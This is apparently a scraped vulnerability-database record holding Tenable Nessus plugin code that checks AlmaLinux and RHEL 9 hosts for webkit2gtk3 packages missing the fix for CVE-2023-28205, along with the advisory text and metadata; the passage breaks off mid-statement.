script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:9::appstream\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:9::baseos\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:9::crb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:9::highavailability\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:9::nfv\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:9::realtime\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:9::resilientstorage\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:9::sap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:9::sap_hana\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:9::supplementary\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Alma Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AlmaLinux/release\", \"Host/AlmaLinux/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/AlmaLinux/release');\nif (isnull(os_release) || 'AlmaLinux' >!< os_release) audit(AUDIT_OS_NOT, 'AlmaLinux');\nvar os_ver = pregmatch(pattern: \"AlmaLinux release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'AlmaLinux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'AlmaLinux 9.x', 'AlmaLinux ' + os_ver);\n\nif (!get_kb_item('Host/AlmaLinux/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'AlmaLinux', cpu);\n\nvar pkgs = [\n {'reference':'webkit2gtk3-2.36.7-1.el9_1.3', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el9_1.3', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el9_1.3', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3', 'release':'9', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'Alma-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-devel / webkit2gtk3-jsc / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-20T13:41:09", "description": "The remote Redhat Enterprise Linux 9 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2023:1918 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS Ventura 13.3.1, iOS 16.4.1 and iPadOS 16.4.1, iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-04-20T00:00:00", "type": "nessus", "title": "RHEL 9 : webkit2gtk3 (RHSA-2023:1918)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-28205"], "modified": "2023-05-24T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:9", "cpe:/o:redhat:rhel_aus:9.2", "cpe:/o:redhat:rhel_e4s:9.2", "cpe:/o:redhat:rhel_eus:9.2", "p-cpe:/a:redhat:enterprise_linux:webkit2gtk3", "p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-devel", "p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-jsc", "p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-jsc-devel"], "id": "REDHAT-RHSA-2023-1918.NASL", "href": "https://www.tenable.com/plugins/nessus/174590", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2023:1918. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174590);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/24\");\n\n script_cve_id(\"CVE-2023-28205\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/01\");\n script_xref(name:\"RHSA\", value:\"2023:1918\");\n\n script_name(english:\"RHEL 9 : webkit2gtk3 (RHSA-2023:1918)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 9 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2023:1918 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS Ventura\n 13.3.1, iOS 16.4.1 and iPadOS 16.4.1, iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1. Processing maliciously\n crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may\n have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2023-28205\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2023:1918\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-28205\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(416);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:9.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:9.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:9.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-jsc-devel\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '9')) audit(AUDIT_OS_NOT, 'Red Hat 9.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu && 'ppc' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/aus/rhel9/9.2/x86_64/appstream/debug',\n 'content/aus/rhel9/9.2/x86_64/appstream/os',\n 'content/aus/rhel9/9.2/x86_64/appstream/source/SRPMS',\n 'content/aus/rhel9/9.2/x86_64/baseos/debug',\n 'content/aus/rhel9/9.2/x86_64/baseos/os',\n 'content/aus/rhel9/9.2/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel9/9.2/aarch64/appstream/debug',\n 'content/e4s/rhel9/9.2/aarch64/appstream/os',\n 'content/e4s/rhel9/9.2/aarch64/appstream/source/SRPMS',\n 'content/e4s/rhel9/9.2/aarch64/baseos/debug',\n 'content/e4s/rhel9/9.2/aarch64/baseos/os',\n 'content/e4s/rhel9/9.2/aarch64/baseos/source/SRPMS',\n 'content/e4s/rhel9/9.2/aarch64/highavailability/debug',\n 'content/e4s/rhel9/9.2/aarch64/highavailability/os',\n 'content/e4s/rhel9/9.2/aarch64/highavailability/source/SRPMS',\n 'content/e4s/rhel9/9.2/ppc64le/appstream/debug',\n 'content/e4s/rhel9/9.2/ppc64le/appstream/os',\n 'content/e4s/rhel9/9.2/ppc64le/appstream/source/SRPMS',\n 'content/e4s/rhel9/9.2/ppc64le/baseos/debug',\n 'content/e4s/rhel9/9.2/ppc64le/baseos/os',\n 'content/e4s/rhel9/9.2/ppc64le/baseos/source/SRPMS',\n 'content/e4s/rhel9/9.2/ppc64le/highavailability/debug',\n 'content/e4s/rhel9/9.2/ppc64le/highavailability/os',\n 'content/e4s/rhel9/9.2/ppc64le/highavailability/source/SRPMS',\n 'content/e4s/rhel9/9.2/ppc64le/resilientstorage/debug',\n 'content/e4s/rhel9/9.2/ppc64le/resilientstorage/os',\n 'content/e4s/rhel9/9.2/ppc64le/resilientstorage/source/SRPMS',\n 'content/e4s/rhel9/9.2/ppc64le/sap-solutions/debug',\n 'content/e4s/rhel9/9.2/ppc64le/sap-solutions/os',\n 'content/e4s/rhel9/9.2/ppc64le/sap-solutions/source/SRPMS',\n 'content/e4s/rhel9/9.2/ppc64le/sap/debug',\n 'content/e4s/rhel9/9.2/ppc64le/sap/os',\n 'content/e4s/rhel9/9.2/ppc64le/sap/source/SRPMS',\n 'content/e4s/rhel9/9.2/s390x/appstream/debug',\n 'content/e4s/rhel9/9.2/s390x/appstream/os',\n 'content/e4s/rhel9/9.2/s390x/appstream/source/SRPMS',\n 'content/e4s/rhel9/9.2/s390x/baseos/debug',\n 'content/e4s/rhel9/9.2/s390x/baseos/os',\n 'content/e4s/rhel9/9.2/s390x/baseos/source/SRPMS',\n 'content/e4s/rhel9/9.2/s390x/highavailability/debug',\n 'content/e4s/rhel9/9.2/s390x/highavailability/os',\n 'content/e4s/rhel9/9.2/s390x/highavailability/source/SRPMS',\n 'content/e4s/rhel9/9.2/s390x/resilientstorage/debug',\n 'content/e4s/rhel9/9.2/s390x/resilientstorage/os',\n 'content/e4s/rhel9/9.2/s390x/resilientstorage/source/SRPMS',\n 'content/e4s/rhel9/9.2/s390x/sap/debug',\n 'content/e4s/rhel9/9.2/s390x/sap/os',\n 'content/e4s/rhel9/9.2/s390x/sap/source/SRPMS',\n 'content/e4s/rhel9/9.2/x86_64/appstream/debug',\n 'content/e4s/rhel9/9.2/x86_64/appstream/os',\n 'content/e4s/rhel9/9.2/x86_64/appstream/source/SRPMS',\n 'content/e4s/rhel9/9.2/x86_64/baseos/debug',\n 'content/e4s/rhel9/9.2/x86_64/baseos/os',\n 'content/e4s/rhel9/9.2/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel9/9.2/x86_64/highavailability/debug',\n 'content/e4s/rhel9/9.2/x86_64/highavailability/os',\n 'content/e4s/rhel9/9.2/x86_64/highavailability/source/SRPMS',\n 'content/e4s/rhel9/9.2/x86_64/resilientstorage/debug',\n 'content/e4s/rhel9/9.2/x86_64/resilientstorage/os',\n 'content/e4s/rhel9/9.2/x86_64/resilientstorage/source/SRPMS',\n 'content/e4s/rhel9/9.2/x86_64/sap-solutions/debug',\n 'content/e4s/rhel9/9.2/x86_64/sap-solutions/os',\n 'content/e4s/rhel9/9.2/x86_64/sap-solutions/source/SRPMS',\n 'content/e4s/rhel9/9.2/x86_64/sap/debug',\n 'content/e4s/rhel9/9.2/x86_64/sap/os',\n 'content/e4s/rhel9/9.2/x86_64/sap/source/SRPMS',\n 'content/eus/rhel9/9.2/aarch64/appstream/debug',\n 'content/eus/rhel9/9.2/aarch64/appstream/os',\n 'content/eus/rhel9/9.2/aarch64/appstream/source/SRPMS',\n 'content/eus/rhel9/9.2/aarch64/baseos/debug',\n 'content/eus/rhel9/9.2/aarch64/baseos/os',\n 'content/eus/rhel9/9.2/aarch64/baseos/source/SRPMS',\n 'content/eus/rhel9/9.2/aarch64/codeready-builder/debug',\n 'content/eus/rhel9/9.2/aarch64/codeready-builder/os',\n 'content/eus/rhel9/9.2/aarch64/codeready-builder/source/SRPMS',\n 'content/eus/rhel9/9.2/aarch64/highavailability/debug',\n 'content/eus/rhel9/9.2/aarch64/highavailability/os',\n 'content/eus/rhel9/9.2/aarch64/highavailability/source/SRPMS',\n 'content/eus/rhel9/9.2/aarch64/supplementary/debug',\n 'content/eus/rhel9/9.2/aarch64/supplementary/os',\n 'content/eus/rhel9/9.2/aarch64/supplementary/source/SRPMS',\n 'content/eus/rhel9/9.2/ppc64le/appstream/debug',\n 'content/eus/rhel9/9.2/ppc64le/appstream/os',\n 'content/eus/rhel9/9.2/ppc64le/appstream/source/SRPMS',\n 'content/eus/rhel9/9.2/ppc64le/baseos/debug',\n 'content/eus/rhel9/9.2/ppc64le/baseos/os',\n 'content/eus/rhel9/9.2/ppc64le/baseos/source/SRPMS',\n 'content/eus/rhel9/9.2/ppc64le/codeready-builder/debug',\n 'content/eus/rhel9/9.2/ppc64le/codeready-builder/os',\n 'content/eus/rhel9/9.2/ppc64le/codeready-builder/source/SRPMS',\n 'content/eus/rhel9/9.2/ppc64le/highavailability/debug',\n 'content/eus/rhel9/9.2/ppc64le/highavailability/os',\n 'content/eus/rhel9/9.2/ppc64le/highavailability/source/SRPMS',\n 'content/eus/rhel9/9.2/ppc64le/resilientstorage/debug',\n 'content/eus/rhel9/9.2/ppc64le/resilientstorage/os',\n 'content/eus/rhel9/9.2/ppc64le/resilientstorage/source/SRPMS',\n 'content/eus/rhel9/9.2/ppc64le/sap-solutions/debug',\n 'content/eus/rhel9/9.2/ppc64le/sap-solutions/os',\n 'content/eus/rhel9/9.2/ppc64le/sap-solutions/source/SRPMS',\n 'content/eus/rhel9/9.2/ppc64le/sap/debug',\n 'content/eus/rhel9/9.2/ppc64le/sap/os',\n 'content/eus/rhel9/9.2/ppc64le/sap/source/SRPMS',\n 'content/eus/rhel9/9.2/ppc64le/supplementary/debug',\n 'content/eus/rhel9/9.2/ppc64le/supplementary/os',\n 'content/eus/rhel9/9.2/ppc64le/supplementary/source/SRPMS',\n 'content/eus/rhel9/9.2/s390x/appstream/debug',\n 'content/eus/rhel9/9.2/s390x/appstream/os',\n 'content/eus/rhel9/9.2/s390x/appstream/source/SRPMS',\n 'content/eus/rhel9/9.2/s390x/baseos/debug',\n 'content/eus/rhel9/9.2/s390x/baseos/os',\n 'content/eus/rhel9/9.2/s390x/baseos/source/SRPMS',\n 'content/eus/rhel9/9.2/s390x/codeready-builder/debug',\n 'content/eus/rhel9/9.2/s390x/codeready-builder/os',\n 'content/eus/rhel9/9.2/s390x/codeready-builder/source/SRPMS',\n 'content/eus/rhel9/9.2/s390x/highavailability/debug',\n 'content/eus/rhel9/9.2/s390x/highavailability/os',\n 'content/eus/rhel9/9.2/s390x/highavailability/source/SRPMS',\n 'content/eus/rhel9/9.2/s390x/resilientstorage/debug',\n 'content/eus/rhel9/9.2/s390x/resilientstorage/os',\n 'content/eus/rhel9/9.2/s390x/resilientstorage/source/SRPMS',\n 'content/eus/rhel9/9.2/s390x/sap/debug',\n 'content/eus/rhel9/9.2/s390x/sap/os',\n 'content/eus/rhel9/9.2/s390x/sap/source/SRPMS',\n 'content/eus/rhel9/9.2/s390x/supplementary/debug',\n 'content/eus/rhel9/9.2/s390x/supplementary/os',\n 'content/eus/rhel9/9.2/s390x/supplementary/source/SRPMS',\n 'content/eus/rhel9/9.2/x86_64/appstream/debug',\n 'content/eus/rhel9/9.2/x86_64/appstream/os',\n 'content/eus/rhel9/9.2/x86_64/appstream/source/SRPMS',\n 'content/eus/rhel9/9.2/x86_64/baseos/debug',\n 'content/eus/rhel9/9.2/x86_64/baseos/os',\n 'content/eus/rhel9/9.2/x86_64/baseos/source/SRPMS',\n 'content/eus/rhel9/9.2/x86_64/codeready-builder/debug',\n 'content/eus/rhel9/9.2/x86_64/codeready-builder/os',\n 'content/eus/rhel9/9.2/x86_64/codeready-builder/source/SRPMS',\n 'content/eus/rhel9/9.2/x86_64/highavailability/debug',\n 'content/eus/rhel9/9.2/x86_64/highavailability/os',\n 'content/eus/rhel9/9.2/x86_64/highavailability/source/SRPMS',\n 'content/eus/rhel9/9.2/x86_64/resilientstorage/debug',\n 'content/eus/rhel9/9.2/x86_64/resilientstorage/os',\n 'content/eus/rhel9/9.2/x86_64/resilientstorage/source/SRPMS',\n 'content/eus/rhel9/9.2/x86_64/sap-solutions/debug',\n 'content/eus/rhel9/9.2/x86_64/sap-solutions/os',\n 'content/eus/rhel9/9.2/x86_64/sap-solutions/source/SRPMS',\n 'content/eus/rhel9/9.2/x86_64/sap/debug',\n 'content/eus/rhel9/9.2/x86_64/sap/os',\n 'content/eus/rhel9/9.2/x86_64/sap/source/SRPMS',\n 'content/eus/rhel9/9.2/x86_64/supplementary/debug',\n 'content/eus/rhel9/9.2/x86_64/supplementary/os',\n 'content/eus/rhel9/9.2/x86_64/supplementary/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'webkit2gtk3-2.36.7-1.el9_1.3', 'sp':'2', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el9_1.3', 'sp':'2', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el9_1.3', 'sp':'2', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3', 'sp':'2', 'release':'9', 'rpm_spec_vers_cmp':TRUE}\n ]\n },\n {\n 'repo_relative_urls': [\n 'content/dist/rhel9/9/aarch64/appstream/debug',\n 'content/dist/rhel9/9/aarch64/appstream/os',\n 'content/dist/rhel9/9/aarch64/appstream/source/SRPMS',\n 'content/dist/rhel9/9/aarch64/baseos/debug',\n 'content/dist/rhel9/9/aarch64/baseos/os',\n 'content/dist/rhel9/9/aarch64/baseos/source/SRPMS',\n 'content/dist/rhel9/9/aarch64/codeready-builder/debug',\n 'content/dist/rhel9/9/aarch64/codeready-builder/os',\n 'content/dist/rhel9/9/aarch64/codeready-builder/source/SRPMS',\n 'content/dist/rhel9/9/aarch64/highavailability/debug',\n 'content/dist/rhel9/9/aarch64/highavailability/os',\n 'content/dist/rhel9/9/aarch64/highavailability/source/SRPMS',\n 'content/dist/rhel9/9/aarch64/supplementary/debug',\n 'content/dist/rhel9/9/aarch64/supplementary/os',\n 'content/dist/rhel9/9/aarch64/supplementary/source/SRPMS',\n 'content/dist/rhel9/9/ppc64le/appstream/debug',\n 'content/dist/rhel9/9/ppc64le/appstream/os',\n 'content/dist/rhel9/9/ppc64le/appstream/source/SRPMS',\n 'content/dist/rhel9/9/ppc64le/baseos/debug',\n 'content/dist/rhel9/9/ppc64le/baseos/os',\n 'content/dist/rhel9/9/ppc64le/baseos/source/SRPMS',\n 'content/dist/rhel9/9/ppc64le/codeready-builder/debug',\n 'content/dist/rhel9/9/ppc64le/codeready-builder/os',\n 'content/dist/rhel9/9/ppc64le/codeready-builder/source/SRPMS',\n 'content/dist/rhel9/9/ppc64le/highavailability/debug',\n 'content/dist/rhel9/9/ppc64le/highavailability/os',\n 'content/dist/rhel9/9/ppc64le/highavailability/source/SRPMS',\n 'content/dist/rhel9/9/ppc64le/resilientstorage/debug',\n 'content/dist/rhel9/9/ppc64le/resilientstorage/os',\n 'content/dist/rhel9/9/ppc64le/resilientstorage/source/SRPMS',\n 'content/dist/rhel9/9/ppc64le/sap-solutions/debug',\n 'content/dist/rhel9/9/ppc64le/sap-solutions/os',\n 'content/dist/rhel9/9/ppc64le/sap-solutions/source/SRPMS',\n 'content/dist/rhel9/9/ppc64le/sap/debug',\n 'content/dist/rhel9/9/ppc64le/sap/os',\n 'content/dist/rhel9/9/ppc64le/sap/source/SRPMS',\n 'content/dist/rhel9/9/ppc64le/supplementary/debug',\n 'content/dist/rhel9/9/ppc64le/supplementary/os',\n 'content/dist/rhel9/9/ppc64le/supplementary/source/SRPMS',\n 'content/dist/rhel9/9/s390x/appstream/debug',\n 'content/dist/rhel9/9/s390x/appstream/os',\n 'content/dist/rhel9/9/s390x/appstream/source/SRPMS',\n 'content/dist/rhel9/9/s390x/baseos/debug',\n 'content/dist/rhel9/9/s390x/baseos/os',\n 'content/dist/rhel9/9/s390x/baseos/source/SRPMS',\n 'content/dist/rhel9/9/s390x/codeready-builder/debug',\n 'content/dist/rhel9/9/s390x/codeready-builder/os',\n 'content/dist/rhel9/9/s390x/codeready-builder/source/SRPMS',\n 'content/dist/rhel9/9/s390x/highavailability/debug',\n 'content/dist/rhel9/9/s390x/highavailability/os',\n 'content/dist/rhel9/9/s390x/highavailability/source/SRPMS',\n 'content/dist/rhel9/9/s390x/resilientstorage/debug',\n 'content/dist/rhel9/9/s390x/resilientstorage/os',\n 'content/dist/rhel9/9/s390x/resilientstorage/source/SRPMS',\n 'content/dist/rhel9/9/s390x/sap/debug',\n 'content/dist/rhel9/9/s390x/sap/os',\n 'content/dist/rhel9/9/s390x/sap/source/SRPMS',\n 'content/dist/rhel9/9/s390x/supplementary/debug',\n 'content/dist/rhel9/9/s390x/supplementary/os',\n 'content/dist/rhel9/9/s390x/supplementary/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/appstream/debug',\n 'content/dist/rhel9/9/x86_64/appstream/os',\n 'content/dist/rhel9/9/x86_64/appstream/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/baseos/debug',\n 'content/dist/rhel9/9/x86_64/baseos/os',\n 'content/dist/rhel9/9/x86_64/baseos/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/codeready-builder/debug',\n 'content/dist/rhel9/9/x86_64/codeready-builder/os',\n 'content/dist/rhel9/9/x86_64/codeready-builder/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/highavailability/debug',\n 'content/dist/rhel9/9/x86_64/highavailability/os',\n 'content/dist/rhel9/9/x86_64/highavailability/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/nfv/debug',\n 'content/dist/rhel9/9/x86_64/nfv/os',\n 'content/dist/rhel9/9/x86_64/nfv/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/resilientstorage/debug',\n 'content/dist/rhel9/9/x86_64/resilientstorage/os',\n 'content/dist/rhel9/9/x86_64/resilientstorage/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/rt/debug',\n 'content/dist/rhel9/9/x86_64/rt/os',\n 'content/dist/rhel9/9/x86_64/rt/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/sap-solutions/debug',\n 'content/dist/rhel9/9/x86_64/sap-solutions/os',\n 'content/dist/rhel9/9/x86_64/sap-solutions/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/sap/debug',\n 'content/dist/rhel9/9/x86_64/sap/os',\n 'content/dist/rhel9/9/x86_64/sap/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/supplementary/debug',\n 'content/dist/rhel9/9/x86_64/supplementary/os',\n 'content/dist/rhel9/9/x86_64/supplementary/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'webkit2gtk3-2.36.7-1.el9_1.3', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el9_1.3', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el9_1.3', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3', 'release':'9', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n var enterprise_linux_flag = rhel_repo_urls_has_content_dist_rhel(repo_urls:repo_relative_urls);\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp']) && !enterprise_linux_flag) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = 